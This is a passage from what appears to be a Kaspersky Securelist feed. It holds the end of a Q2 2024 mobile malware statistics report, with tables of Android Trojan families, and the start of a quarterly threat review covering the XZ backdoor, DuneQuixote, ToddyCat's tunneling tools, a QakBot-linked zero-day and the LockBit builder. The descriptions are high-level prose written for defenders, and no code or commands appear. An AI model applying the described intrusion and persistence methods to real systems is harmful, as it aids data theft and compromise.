  2325. <td>Trojan-Dropper.AndroidOS.Badpack.g</td>
  2326. <td>1.87</td>
  2327. <td>1.40</td>
  2328. <td>-0.47</td>
  2329. <td>+1</td>
  2330. </tr>
  2331. <tr>
  2332. <td>Trojan.AndroidOS.Triada.ex</td>
  2333. <td>2.42</td>
  2334. <td>1.37</td>
  2335. <td>-1.05</td>
  2336. <td>-5</td>
  2337. </tr>
  2338. <tr>
  2339. <td>Trojan-Banker.AndroidOS.Mamont.aq</td>
  2340. <td>0.00</td>
  2341. <td>1.36</td>
  2342. <td>+1.36</td>
  2343. <td></td>
  2344. </tr>
  2345. <tr>
  2346. <td>Trojan-Downloader.AndroidOS.Agent.ms</td>
  2347. <td>1.39</td>
  2348. <td>1.34</td>
  2349. <td>-0.05</td>
  2350. <td>+5</td>
  2351. </tr>
  2352. <tr>
  2353. <td>Trojan.AndroidOS.Triada.gh</td>
  2354. <td>0.00</td>
  2355. <td>1.31</td>
  2356. <td>+1.31</td>
  2357. <td></td>
  2358. </tr>
  2359. <tr>
  2360. <td>Trojan-Downloader.AndroidOS.Agent.mm</td>
  2361. <td>2.12</td>
  2362. <td>1.29</td>
  2363. <td>-0.83</td>
  2364. <td>-8</td>
  2365. </tr>
  2366. </tbody>
  2367. </table>
  2368. <p>The generalized cloud verdict DangerousObject.Multi.Generic returned to the top spot, and the cloud AI-delivered verdict DangerousObject.AndroidOS.GenericML also moved up. Also placing highly again were the Fakemoney Trojan, which scams users out of personal data with a promise of easy cash, the pre-installed Dwphon Trojan and modified versions of WhatsApp with built-in Triada modules. The latter include Trojan-Downloader.AndroidOS.Agent.ms.</p>
  2369. <p>The Mamont banking Trojan, which steals money by scanning text messages, saw quite a jump in its popularity.</p>
  2370. <h2 id="region-specific-malware">Region-specific malware</h2>
  2371. <p>This section describes malware whose activity is concentrated in specific countries.</p>
  2372. <table width="100%">
  2373. <tbody>
  2374. <tr>
  2375. <td width="40%"><strong>Verdict</strong></td>
  2376. <td width="30%"><strong>Country*</strong></td>
  2377. <td width="30%"><strong>%**</strong></td>
  2378. </tr>
  2379. <tr>
  2380. <td>Backdoor.AndroidOS.Tambir.a</td>
  2381. <td>Turkey</td>
  2382. <td>99.51</td>
  2383. </tr>
  2384. <tr>
  2385. <td>Trojan-Banker.AndroidOS.BrowBot.q</td>
  2386. <td>Turkey</td>
  2387. <td>99.30</td>
  2388. </tr>
  2389. <tr>
  2390. <td>Trojan-Banker.AndroidOS.BrowBot.a</td>
  2391. <td>Turkey</td>
  2392. <td>98.88</td>
  2393. </tr>
  2394. <tr>
  2395. <td>Backdoor.AndroidOS.Tambir.d</td>
  2396. <td>Turkey</td>
  2397. <td>98.24</td>
  2398. </tr>
  2399. <tr>
  2400. <td>Trojan-Banker.AndroidOS.Rewardsteal.dn</td>
  2401. <td>India</td>
  2402. <td>98.18</td>
  2403. </tr>
  2404. <tr>
  2405. <td>Trojan-Banker.AndroidOS.UdangaSteal.k</td>
  2406. <td>India</td>
  2407. <td>97.44</td>
  2408. </tr>
  2409. <tr>
  2410. <td>HackTool.AndroidOS.FakePay.c</td>
  2411. <td>Brazil</td>
  2412. <td>97.43</td>
  2413. </tr>
  2414. <tr>
  2415. <td>Trojan-Banker.AndroidOS.Rewardsteal.c</td>
  2416. <td>India</td>
  2417. <td>97.03</td>
  2418. </tr>
  2419. <tr>
  2420. <td>Trojan-Banker.AndroidOS.Agent.ox</td>
  2421. <td>India</td>
  2422. <td>96.97</td>
  2423. </tr>
  2424. <tr>
  2425. <td>Trojan-Spy.AndroidOS.SmsThief.wk</td>
  2426. <td>India</td>
  2427. <td>96.92</td>
  2428. </tr>
  2429. <tr>
  2430. <td>Trojan-Banker.AndroidOS.Rewardsteal.n</td>
  2431. <td>India</td>
  2432. <td>96.74</td>
  2433. </tr>
  2434. <tr>
  2435. <td>Trojan-Banker.AndroidOS.UdangaSteal.f</td>
  2436. <td>Indonesia</td>
  2437. <td>96.40</td>
  2438. </tr>
  2439. <tr>
  2440. <td>Backdoor.AndroidOS.Tambir.b</td>
  2441. <td>Turkey</td>
  2442. <td>96.20</td>
  2443. </tr>
  2444. <tr>
  2445. <td>Trojan-Dropper.AndroidOS.Hqwar.hc</td>
  2446. <td>Turkey</td>
  2447. <td>96.19</td>
  2448. </tr>
  2449. <tr>
  2450. <td>Trojan-Banker.AndroidOS.Agent.pp</td>
  2451. <td>India</td>
  2452. <td>95.97</td>
  2453. </tr>
  2454. <tr>
  2455. <td>Trojan-Banker.AndroidOS.UdangaSteal.b</td>
  2456. <td>Indonesia</td>
  2457. <td>95.23</td>
  2458. </tr>
  2459. <tr>
  2460. <td>Trojan-Dropper.AndroidOS.Agent.sm</td>
  2461. <td>Turkey</td>
  2462. <td>95.11</td>
  2463. </tr>
  2464. <tr>
  2465. <td>Trojan-SMS.AndroidOS.EvilInst.f</td>
  2466. <td>Thailand</td>
  2467. <td>95.05</td>
  2468. </tr>
  2469. <tr>
  2470. <td>Trojan-SMS.AndroidOS.EvilInst.b</td>
  2471. <td>Thailand</td>
  2472. <td>94.64</td>
  2473. </tr>
  2474. <tr>
  2475. <td>Trojan-Spy.AndroidOS.SmsThief.vb</td>
  2476. <td>Indonesia</td>
  2477. <td>94.57</td>
  2478. </tr>
  2479. <tr>
  2480. <td>Trojan-Banker.AndroidOS.Coper.b</td>
  2481. <td>Turkey</td>
  2482. <td>94.31</td>
  2483. </tr>
  2484. </tbody>
  2485. </table>
  2486. <p><em>*Country where the malware was most active.</em><br />
  2487. <em>**Unique users who encountered this Trojan modification in the given country as a percentage of all users of Kaspersky mobile solutions targeted by this modification.</em></p>
  2488. <p>Users in Turkey continue to face banking Trojan attacks. At the same time, the list of malware active in the country remains unchanged: the VNC backdoor Tambir, the text message-stealing Trojan BrowBot and Hqwar banking Trojan packers were already mentioned in a <a href="https://securelist.com/it-threat-evolution-q1-2024-mobile-statistics/112750/" target="_blank" rel="noopener">past report</a>.</p>
  2489. <p>Indonesia still has the largest concentration of UdangaSteal Trojans for stealing text messages. These are often sent to victims under the guise of wedding invitations. Similar to the last quarter, the payment-simulating app FakePay was widespread in Brazil, while users in Thailand ran into the EvilInst Trojan, which sends paid text messages.</p>
  2490. <p>A large number of families centered in India made it to the top. Rewardsteal snatches banking data under the pretense of a money giveaway; SmsThief.wk and Agent.ox steal text messages.</p>
  2491. <h2 id="mobile-banking-trojans">Mobile banking Trojans</h2>
  2492. <p>The number of new unique installation packages for banking Trojans remains at the same level for the third quarter straight.</p>
  2493. <div class="js-infogram-embed" data-id="_/3Vl3pyyuAzTSpGhidB5i" data-type="interactive" data-title="05 EN-RU-ES q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div>
  2494. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2023 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02155813/it_threat_evolution_q2_2024_mobile_statistics_en_05.png" target="_blank" rel="noopener">download</a>)</em></p>
  2495. <p>The total number of Trojan-Banker attacks is still on the rise, meaning that each new banking Trojan released by threat actors is increasingly used in attacks.</p>
  2496. <p>TOP 10 mobile bankers</p>
  2497. <table width="100%">
  2498. <tbody>
  2499. <tr>
  2500. <td width="40%"><strong>Verdict</strong></td>
  2501. <td width="15%"><strong>Prev %</strong></td>
  2502. <td width="15%"><strong>New %</strong></td>
  2503. <td width="15%"><strong>Difference in p.p.</strong></td>
  2504. <td width="15%"><strong>Change in ranking</strong></td>
  2505. </tr>
  2506. <tr>
  2507. <td>Trojan-Banker.AndroidOS.Mamont.aq</td>
  2508. <td>0.00</td>
  2509. <td>14.13</td>
  2510. <td>+14.13</td>
  2511. <td></td>
  2512. </tr>
  2513. <tr>
  2514. <td>Trojan-Banker.AndroidOS.UdangaSteal.b</td>
  2515. <td>7.00</td>
  2516. <td>10.10</td>
  2517. <td>+3.10</td>
  2518. <td>+3</td>
  2519. </tr>
  2520. <tr>
  2521. <td>Trojan-Banker.AndroidOS.Bian.h</td>
  2522. <td>10.21</td>
  2523. <td>7.46</td>
  2524. <td>-2.76</td>
  2525. <td>0</td>
  2526. </tr>
  2527. <tr>
  2528. <td>Trojan-Banker.AndroidOS.GodFather.m</td>
  2529. <td>0.97</td>
  2530. <td>6.41</td>
  2531. <td>+5.44</td>
  2532. <td>+20</td>
  2533. </tr>
  2534. <tr>
  2535. <td>Trojan-Banker.AndroidOS.Faketoken.z</td>
  2536. <td>1.39</td>
  2537. <td>5.17</td>
  2538. <td>+3.79</td>
  2539. <td>+14</td>
  2540. </tr>
  2541. <tr>
  2542. <td>Trojan-Banker.AndroidOS.Mamont.am</td>
  2543. <td>0.00</td>
  2544. <td>5.12</td>
  2545. <td>+5.12</td>
  2546. <td></td>
  2547. </tr>
  2548. <tr>
  2549. <td>Trojan-Banker.AndroidOS.Mamont.o</td>
  2550. <td>4.58</td>
  2551. <td>5.00</td>
  2552. <td>+0.42</td>
  2553. <td>-1</td>
  2554. </tr>
  2555. <tr>
  2556. <td>Trojan-Banker.AndroidOS.Agent.pp</td>
  2557. <td>0.00</td>
  2558. <td>4.59</td>
  2559. <td>+4.59</td>
  2560. <td></td>
  2561. </tr>
  2562. <tr>
  2563. <td>Trojan-Banker.AndroidOS.Agent.eq</td>
  2564. <td>13.39</td>
  2565. <td>4.51</td>
  2566. <td>-8.88</td>
  2567. <td>-8</td>
  2568. </tr>
  2569. <tr>
  2570. <td>Trojan-Banker.AndroidOS.Svpeng.aj</td>
  2571. <td>0.95</td>
  2572. <td>3.74</td>
  2573. <td>+2.79</td>
  2574. <td>+15</td>
  2575. </tr>
  2576. </tbody>
  2577. </table>
  2578. <h2 id="mobile-ransomware-trojans">Mobile ransomware Trojans</h2>
  2579. <p>The number of ransomware installation packages decreased compared to Q1 2024 to roughly the same level as a year ago.</p>
  2580. <div class="js-infogram-embed" data-id="_/oobs9b7A5yG9sNk7eb0o" data-type="interactive" data-title="06 EN-RU-ES q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div>
  2581. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q2 2023 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02160218/it_threat_evolution_q2_2024_mobile_statistics_en_06.png" target="_blank" rel="noopener">download</a>)</em></p>
  2582. <p>In the distribution of attacks, Rasket and Rkor ransomware dropped out of the top, and Pigetrl also fell. Other top-ranking families became markedly more active, not only percentage-wise, but in terms of absolute numbers.</p>
  2583. <table width="100%">
  2584. <tbody>
  2585. <tr>
  2586. <td width="40%"><strong>Verdict</strong></td>
  2587. <td width="15%"><strong>Prev %</strong></td>
  2588. <td width="15%"><strong>New %</strong></td>
  2589. <td width="15%"><strong>Difference in p.p.</strong></td>
  2590. <td width="15%"><strong>Change in ranking</strong></td>
  2591. </tr>
  2592. <tr>
  2593. <td>Trojan-Ransom.AndroidOS.Svpeng.ac</td>
  2594. <td>11.17</td>
  2595. <td>52.56</td>
  2596. <td>+41.39</td>
  2597. <td>+3</td>
  2598. </tr>
  2599. <tr>
  2600. <td>Trojan-Ransom.AndroidOS.Congur.cw</td>
  2601. <td>10.96</td>
  2602. <td>52.41</td>
  2603. <td>+41.45</td>
  2604. <td>+3</td>
  2605. </tr>
  2606. <tr>
  2607. <td>Trojan-Ransom.AndroidOS.Small.cj</td>
  2608. <td>10.49</td>
  2609. <td>49.76</td>
  2610. <td>+39.26</td>
  2611. <td>+3</td>
  2612. </tr>
  2613. <tr>
  2614. <td>Trojan-Ransom.AndroidOS.Congur.ap</td>
  2615. <td>6.66</td>
  2616. <td>41.52</td>
  2617. <td>+34.86</td>
  2618. <td>+3</td>
  2619. </tr>
  2620. <tr>
  2621. <td>Trojan-Ransom.AndroidOS.Svpeng.ah</td>
  2622. <td>6.03</td>
  2623. <td>35.62</td>
  2624. <td>+29.59</td>
  2625. <td>+4</td>
  2626. </tr>
  2627. <tr>
  2628. <td>Trojan-Ransom.AndroidOS.Congur.bf</td>
  2629. <td>4.15</td>
  2630. <td>32.98</td>
  2631. <td>+28.83</td>
  2632. <td>+5</td>
  2633. </tr>
  2634. <tr>
  2635. <td>Trojan-Ransom.AndroidOS.Svpeng.snt</td>
  2636. <td>5.72</td>
  2637. <td>25.72</td>
  2638. <td>+20.00</td>
  2639. <td>+3</td>
  2640. </tr>
  2641. <tr>
  2642. <td>Trojan-Ransom.AndroidOS.Svpeng.ad</td>
  2643. <td>3.42</td>
  2644. <td>24.79</td>
  2645. <td>+21.37</td>
  2646. <td>+4</td>
  2647. </tr>
  2648. <tr>
  2649. <td>Trojan-Ransom.AndroidOS.Svpeng.ab</td>
  2650. <td>3.32</td>
  2651. <td>24.60</td>
  2652. <td>+21.28</td>
  2653. <td>+5</td>
  2654. </tr>
  2655. <tr>
  2656. <td>Trojan-Ransom.AndroidOS.Pigetrl.a</td>
  2657. <td>15.56</td>
  2658. <td>12.70</td>
  2659. <td>-2.86</td>
  2660. <td>-8</td>
  2661. </tr>
  2662. </tbody>
  2663. </table>
  2664. ]]></content:encoded>
  2665. <wfw:commentRss>https://securelist.com/it-threat-evolution-q2-2024-mobile-statistics/113678/feed/</wfw:commentRss>
  2666. <slash:comments>0</slash:comments>
  2667. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  2668. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  2669. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  2670. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  2671. </item>
  2672. <item>
  2673. <title>IT threat evolution Q2 2024</title>
  2674. <link>https://securelist.com/it-threat-evolution-q2-2024/113669/</link>
  2675. <comments>https://securelist.com/it-threat-evolution-q2-2024/113669/#respond</comments>
  2676. <dc:creator><![CDATA[David Emm]]></dc:creator>
  2677. <pubDate>Tue, 03 Sep 2024 08:00:08 +0000</pubDate>
  2678. <category><![CDATA[Malware reports]]></category>
  2679. <category><![CDATA[BitLocker]]></category>
  2680. <category><![CDATA[DuneQuixote]]></category>
  2681. <category><![CDATA[Linux]]></category>
  2682. <category><![CDATA[LockBit]]></category>
  2683. <category><![CDATA[Malware]]></category>
  2684. <category><![CDATA[Malware Descriptions]]></category>
  2685. <category><![CDATA[Malware Technologies]]></category>
  2686. <category><![CDATA[QakBot]]></category>
  2687. <category><![CDATA[Ransomware]]></category>
  2688. <category><![CDATA[ToddyCat]]></category>
  2689. <category><![CDATA[XZ]]></category>
  2690. <category><![CDATA[Unix and macOS malware]]></category>
  2691. <category><![CDATA[Windows malware]]></category>
  2692. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113669</guid>
  2693.  
  2694. <description><![CDATA[In this report, Kaspersky researchers explore the most significant attacks of Q2 2024 that used a XZ backdoor, the LockBit builder, ShrinkLocker ransomware, etc.]]></description>
  2695. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="targeted-attacks">Targeted attacks</h2>
  2696. <h3 id="xz-backdoor-a-supply-chain-attack-in-the-making">XZ backdoor: a supply chain attack in the making</h3>
  2697. <p>On March 29, a <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4" target="_blank" rel="noopener">message</a> on the Openwall oss-security mailing list announced the discovery of a backdoor in XZ, a compression utility included in many popular Linux distributions. The backdoored library is used by the OpenSSH server process <em>sshd</em>. On a number of <em>systemd</em>-based distributions, including Ubuntu, Debian and RedHat/Fedora Linux, OpenSSH is patched to use <em>systemd</em> features and is therefore dependent on the library (Arch Linux and Gentoo are not affected). The code was inserted in February and March 2024, mostly by Jia Cheong Tan – probably a fictitious identity. We suspect that the goal of the attack was to introduce exclusive remote code execution capabilities into the <em>sshd</em> process by targeting the XZ build process; and then to push the backdoored code out to major Linux distributions as a part of a large-scale supply chain attack.</p>
  2698. <h4 id="timeline-of-events">Timeline of events</h4>
  2699. <p>2024.01.19 XZ website moved to GitHub pages by new maintainer (jiaT75)<br />
  2700. 2024.02.15 &#8220;build-to-host.m4&#8221; is added to .gitignore<br />
  2701. 2024.02.23 two &#8220;test files&#8221; containing the stages of the malicious script are introduced<br />
  2702. 2024.02.24 XZ 5.6.0 is released<br />
  2703. 2024.02.26 commit in CMakeLists.txt that sabotages the Landlock security feature<br />
  2704. 2024.03.04 the backdoor leads to issues with Valgrind<br />
  2705. 2024.03.09 two &#8220;test files&#8221; are updated, CRC functions are modified, Valgrind issue is &#8220;fixed&#8221;<br />
  2706. 2024.03.09 XZ 5.6.1 is released<br />
  2707. 2024.03.28 bug is discovered, Debian and RedHat notified<br />
  2708. 2024.03.28 Debian rolls back XZ 5.6.1 to version 5.4.5-0.2<br />
  2709. 2024.03.29 an email is published on the oss-security mailing list<br />
  2710. 2024.03.29 RedHat confirms backdoored XZ was shipped in Fedora Rawhide and Fedora Linux 40 beta<br />
  2711. 2024.03.30 Debian shuts down builds and starts process to rebuild them<br />
  2712. 2024.04.02 XZ main developer acknowledges backdoor incident</p>
  2713. <p>While earlier supply chain attacks we have seen in Node.js, <a href="https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/" target="_blank" rel="noopener">PyPI</a>, <a href="https://social.librem.one/@eighthave/112194828562355097" target="_blank" rel="noopener">FDroid</a>, and the Linux <a href="https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh@linuxfoundation.org/" target="_blank" rel="noopener">kernel</a> consisted mostly of atomic malicious patches, fake packages and typo-squatted package names, this incident was a multi-stage operation that came close to compromising SSH servers on a global scale.</p>
  2714. <p>The backdoor in the <em>liblzma</em> library was introduced at two levels. The source code of the build infrastructure that generated the final packages was modified slightly (by introducing an additional file <em>build-to-host.m4</em>) to extract the next stage script hidden in a test-case file (<em>bad-3-corrupt_lzma2.xz</em>). This script, in turn, extracted a malicious binary component from another test-case file (<em>good-large_compressed.lzma</em>) that was linked to the legitimate library during the compilation process to be shipped to Linux repositories. Major vendors in turn shipped the malicious component in beta and experimental builds. The XZ compromise was assigned the identifier <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3094" target="_blank" rel="noopener">CVE-2024-3094</a> and the maximum severity level of 10.</p>
  2715. <p>The attackers&#8217; initial goal was to hook one of the functions related to RSA key manipulation. In our analysis of the hook process, we focused on the behavior of the backdoor inside OpenSSH, specifically <a href="https://www.openssh.com/portable.html" target="_blank" rel="noopener">OpenSSH portable</a> version 9.7p1 (the latest version). Our analysis revealed a number of interesting details about the backdoor&#8217;s functionality.</p>
  2716. <ul>
  2717. <li>The attacker set an anti-replay feature to prevent possible capture or hijacking of the backdoor communications.</li>
  2718. <li>The author used a custom steganography technique in the x86 code to hide the public key.</li>
  2719. <li>The backdoor hooks the logging function to hide its logs of unauthorized connections to the SSH server.</li>
  2720. <li>The backdoor hooks the password authentication function to allow the attacker to use any username/password to log in to the infected server without any further verification. It does the same with public key authentication.</li>
  2721. <li>The backdoor has remote code execution capabilities that allow the attacker to execute any system command on the infected server.</li>
  2722. </ul>
  2723. <p>It&#8217;s clear that this is a highly sophisticated threat. The attackers used social engineering to gain long-term access to the development environment and extended it with fake human interactions in plain sight. They have extensive knowledge of the internals of open-source projects such as SSH and <em>libc</em>, as well as expertise in code/script obfuscation used to initiate the infection process. A number of things make this threat unique, including the way the public key information is embedded in the binary code itself, complicating the recovery process, and the meticulous preparation of the operation.</p>
  2724. <p>Kaspersky products detect malicious objects associated with the attack as HEUR:Trojan.Script.XZ and Trojan.Shell.XZ. In addition, Kaspersky Endpoint Security for Linux detects malicious code in <em>sshd</em> process memory as MEM:Trojan.Linux.XZ (as part of the Critical Areas Scan task).</p>
  2725. <p>For more information, read our <a href="https://securelist.com/xz-backdoor-story-part-1/112354/" target="_blank" rel="noopener">initial analysis</a>, <a href="https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/" target="_blank" rel="noopener">incident assessment</a> and <a href="https://securelist.com/xz-backdoor-part-3-hooking-ssh/113007/" target="_blank" rel="noopener">in-depth hook analysis</a>.</p>
  2726. <h3 id="dunequixote-campaign-targeting-the-middle-east">DuneQuixote campaign targeting the Middle East</h3>
  2727. <p>In February, we discovered a <a href="https://securelist.com/dunequixote/112425/" target="_blank" rel="noopener">new malware campaign</a> targeting government entities in the Middle East that we dubbed DuneQuixote. Our investigation uncovered more than 30 DuneQuixote dropper samples being actively used in this campaign. Some were regular droppers, while others were manipulated installer files for a legitimate tool called Total Commander. The droppers carried malicious code to download a backdoor that we dubbed CR4T. While we have only identified two of these implants, we strongly believe that there may be more in the form of completely different malware. The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion techniques in both network communications and the malware code.</p>
  2728. <p>The initial dropper is a Windows x64 executable file, written in C/C++, although there are DLL versions of the malware that provide the same functionality. Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls are primarily string comparison functions that are executed without any conditional jumps based on the comparison results. The strings specified in these functions are snippets of Spanish poetry. These vary from one sample to the next, changing the signature of each sample to evade traditional detection methods.</p>
  2729. <p>The primary goal of the CR4T implant is to give attackers access to a console for command line execution on the infected computer. It also facilitates the download, upload and modification of files.</p>
  2730. <p>We also discovered a Golang version of the CR4T implant that has similar capabilities to the C version. A notable difference of this version is the ability to create scheduled tasks using the Golang <a href="https://github.com/go-ole/go-ole" target="_blank" rel="noopener">Go-ole</a> library, which uses Windows Component Object Model (COM) object interfaces to interact with the Task Scheduler service.</p>
  2731. <p>Through the use of memory-only implants and droppers masquerading as legitimate software that mimics the Total Commander installer, the attackers demonstrate above-average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and ingenuity of the threat actor behind this campaign.</p>
  2732. <h3 id="toddycat-punching-holes-in-your-infrastructure">ToddyCat: punching holes in your infrastructure</h3>
  2733. <p>The threat actor ToddyCat predominantly targets government organizations in the Asia-Pacific region, primarily to steal sensitive data. In our <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">previous article</a>, we described the tools the attackers use to collect and exfiltrate files (LoFiSe and PcExter). <a href="https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/" target="_blank" rel="noopener">More recently</a>, we examined how this threat actor maintains constant access to compromised infrastructure, the information they are interested in and the tools they use to extract it.</p>
  2734. <p>Our investigation revealed that ToddyCat was stealing data on an industrial scale. To steal large volumes of data, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor the systems they attack.</p>
  2735. <p>ToddyCat used several methods to accomplish this. One was to create a reverse SSH tunnel. They launched this using the SSH client from the OpenSSH for Windows toolkit, along with the library required to run it, an OPENSSH private key file, and a script, <em>a.bat</em>, to hide the private key file. The attackers transferred files to the target host via SMB using shared folders.</p>
  2736. <p>The threat actor also made use of the server utility (VPN Server) from the SoftEther VPN package for tunneling. This package is an open-source solution developed as part of academic research at the University of Tsukuba, which allows the creation of VPN connections using a variety of popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.</p>
  2737. <p>Another way ToddyCat accessed remote infrastructure was by tunneling to a legitimate cloud provider: an application running on the user&#8217;s host with access to the local infrastructure can connect to the cloud through a legitimate agent and redirect traffic or execute specific commands.</p>
  2738. <p><a href="https://ngrok.com/docs/agent/" target="_blank" rel="noopener">Ngrok</a> is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed Ngrok on target hosts and used it to redirect command and control (C2) traffic from the cloud infrastructure to a specific port on those hosts.</p>
  2739. <p>They also used Krong, a proxy that uses XOR to encrypt the data passing through it, thereby concealing the content of the traffic to avoid detection.</p>
  2740. <p>After creating tunnels on the target hosts using OpenSSH or SoftEther VPN, the threat actor also installed the <a href="https://github.com/fatedier/frp" target="_blank" rel="noopener">FRP client</a>, a fast reverse proxy written in Go that allows access from the internet to a local server behind a NAT or firewall.</p>
  2741. <p>ToddyCat used various tools to collect data. They used one of the tools, which we named &#8220;cuthead&#8221; (the name came from the file description field of the sample we found), to search for documents. They used &#8220;WAExp&#8221;, a WhatsApp data stealer, to search for and collect browser local storage files containing data from the web version of WhatsApp. The attackers also used a tool called &#8220;TomBerBil&#8221; to steal passwords from browsers.</p>
  2742. <p>To protect against such attacks, we recommend that organizations add the resources and IP addresses of cloud services that provide traffic tunneling to the corporate firewall denylist. We also recommend limiting the range of tools administrators can use to remotely access hosts: other tools should either be prohibited or closely monitored as possible indicators of suspicious activity. In addition, employees should avoid storing passwords in browsers, as this helps attackers gain access to sensitive information. Moreover, reusing passwords across services increases the amount of data available to attackers.</p>
  2743. <h2 id="other-malware">Other malware</h2>
  2744. <h3 id="qakbot-attacks-with-windows-zero-day">QakBot attacks with Windows zero-day</h3>
  2745. <p>In early April we investigated the Windows DWM (Desktop Window Manager) Core Library Elevation of Privilege Vulnerability (<a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36033" target="_blank" rel="noopener">CVE-2023-36033</a>), which was previously discovered as a zero-day being exploited in the wild. While searching for samples related to this exploit and attacks using it, we found a curious document uploaded to VirusTotal on April 1. This document caught our attention because it had a descriptive file name indicating that it contained information about a Windows vulnerability.</p>
  2746. <p>Inside we found a brief description of a Windows DWM vulnerability and how it could be exploited to gain system privileges – all written in very poor English. The exploitation process described in this document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033 – but the vulnerability was different.</p>
  2747. <p>The poor quality of the writing, and the fact the document was missing some important details about how to actually trigger the vulnerability, suggested that the vulnerability described was completely made up or was present in code that could not be accessed or controlled by attackers.</p>
  2748. <p>However, a quick check revealed that this was a real zero-day vulnerability that could be used to escalate privileges, so we immediately reported our findings to Microsoft. The vulnerability was assigned <a href="https://securelist.com/cve-2024-30051/112618/" target="_blank" rel="noopener">CVE-2024-30051</a> and a patch was released as part of Patch Tuesday on May 14.</p>
  2749. <p>We also began closely monitoring our statistics for exploits and attacks using this zero-day, and in mid-April we discovered an exploit. We have seen this zero-day used in conjunction with <a href="https://securelist.com/?s=QakBot" target="_blank" rel="noopener">QakBot</a> and other malware, and believe that multiple threat actors have access to it.</p>
  2750. <p>Kaspersky products detect the exploitation of CVE-2024-30051 and related malware with the following verdicts:</p>
  2751. <ul>
  2752. <li>PDM:Exploit.Win32.Generic;</li>
  2753. <li>PDM:Trojan.Win32.Generic.</li>
  2754. </ul>
  2755. <h3 id="using-the-lockbit-builder-to-generate-targeted-ransomware">Using the LockBit builder to generate targeted ransomware</h3>
  2756. <p>Last year, we published our <a href="https://securelist.com/lockbit-ransomware-builder-analysis/110370/" target="_blank" rel="noopener">research on the LockBit 3.0 builder</a>. Leaked in 2022, this builder greatly simplified the creation of custom ransomware.</p>
  2757. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-113672" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01.png" alt="" width="920" height="393" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01.png 920w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-300x128.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-768x328.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-819x350.png 819w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-740x316.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-655x280.png 655w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184325/it_threat_evolution_q2_2024_01-800x342.png 800w" sizes="(max-width: 920px) 100vw, 920px" /></a></p>
  2758. <p>The <em>keygen.exe</em> file generates public and private keys used for encryption and decryption. The <em>builder.exe</em> file generates the variant according to the options set in the <em>config.json</em> file. The whole process is automated by the <em>build.bat</em> script.</p>
